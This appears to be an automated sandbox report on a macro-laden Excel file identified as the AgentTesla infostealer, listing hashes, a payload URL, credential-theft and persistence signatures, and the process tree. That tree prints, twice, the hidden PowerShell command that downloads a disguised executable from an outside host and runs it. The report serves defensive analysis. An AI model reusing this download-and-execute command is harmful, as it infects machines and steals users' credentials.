Analysis
  max time kernel:   137s
  max time network:  137s
  platform:          windows10_x64
  resource:          win10v200430
  submitted:         10/07/2020, 07:13
Static task: static1

Behavioral task: behavioral1
  Sample:   CO-MFE-6-2020.xlsm
  Resource: win7

Behavioral task: behavioral2
  Sample:   CO-MFE-6-2020.xlsm
  Resource: win10v200430
General
  Target:  CO-MFE-6-2020.xlsm
  Size:    173KB
  MD5:     84ba27c4b3083be263a54322adec3149
  SHA1:    2548d9097c1b27f064a7089afe393fde0fbfa64d
  SHA256:  fbe5f71e75c1b92c68a6da3698f42a2ca2f9fcc6f620f494c562583c194b2011
  SHA512:  1553f2c39b55a83161326b232b507d3cf957f633462ccd6bf19b9f6890ded4d70c7c0459347f88cf45c0c846e54672a393914b6f66778748b351e397743a914e
Malware Config
  Extracted: http://shopcart.indbytes.com/cig/4501307788.jpg
Signatures

Suspicious use of WriteProcessMemory (11 IoCs)
  description                        pid   Process         procid_target
  PID 1612 wrote to memory of 3864   1612  EXCEL.EXE       71   (2 entries)
  PID 3864 wrote to memory of 3472   3864  cmd.exe         73   (2 entries)
  PID 3472 wrote to memory of 1072   3472  powershell.exe  76   (3 entries)
  PID 1072 wrote to memory of 3792   1072  Name.exe        78   (4 entries)

Suspicious behavior: EnumeratesProcesses (5 IoCs)
  pid   Process
  3472  powershell.exe  (3 entries)
  3792  RegAsm.exe      (2 entries)

Suspicious use of SetThreadContext (1 IoC)
  description                          pid   Process   procid_target
  PID 1072 set thread context of 3792  1072  Name.exe  78

Drops startup file (1 IoC)
  description   ioc                                                                                        Process
  File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe  Name.exe

Executes dropped EXE (1 IoC)
  pid   Process
  1072  Name.exe

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
  description                                                                                              pid   pid_target  Process  procid_target
  Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process  3864  1612        cmd.exe  67

Blacklisted process makes network request (1 IoC)
  flow  pid   Process
  17    3472  powershell.exe

Suspicious behavior: MapViewOfSection (1 IoC)
  pid   Process
  1072  Name.exe

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
  description        ioc                                                                                   Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0                      EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  EXCEL.EXE

Enumerates system info in registry (2 TTPs, 3 IoCs)
  description        ioc                                                        Process
  Key opened         \REGISTRY\MACHINE\Hardware\Description\System\BIOS         EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily  EXCEL.EXE
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU     EXCEL.EXE

Suspicious use of SetWindowsHookEx (15 IoCs)
  pid   Process
  1612  EXCEL.EXE   (14 entries)
  3792  RegAsm.exe  (1 entry)

Suspicious behavior: AddClipboardFormatListener (1 IoC)
  pid   Process
  1612  EXCEL.EXE

Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  3472  powershell.exe
  Token: SeDebugPrivilege  3792  RegAsm.exe
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Processes

1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\CO-MFE-6-2020.xlsm"
   PID: 1612
   - Suspicious use of WriteProcessMemory
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious use of SetWindowsHookEx
   - Suspicious behavior: AddClipboardFormatListener

   2. C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
      PID: 3864
      - Suspicious use of WriteProcessMemory
      - Process spawned unexpected child process

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
         Command line: powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://shopcart.indbytes.com/cig/4501307788.jpg',$env:Temp+'\Name.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\Name.exe')
         PID: 3472
         - Suspicious use of WriteProcessMemory
         - Suspicious behavior: EnumeratesProcesses
         - Blacklisted process makes network request
         - Suspicious use of AdjustPrivilegeToken

         4. C:\Users\Admin\AppData\Local\Temp\Name.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\Name.exe"
            PID: 1072
            - Suspicious use of WriteProcessMemory
            - Suspicious use of SetThreadContext
            - Drops startup file
            - Executes dropped EXE
            - Suspicious behavior: MapViewOfSection

            5. C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
               Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
               PID: 3792
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of SetWindowsHookEx
               - Suspicious use of AdjustPrivilegeToken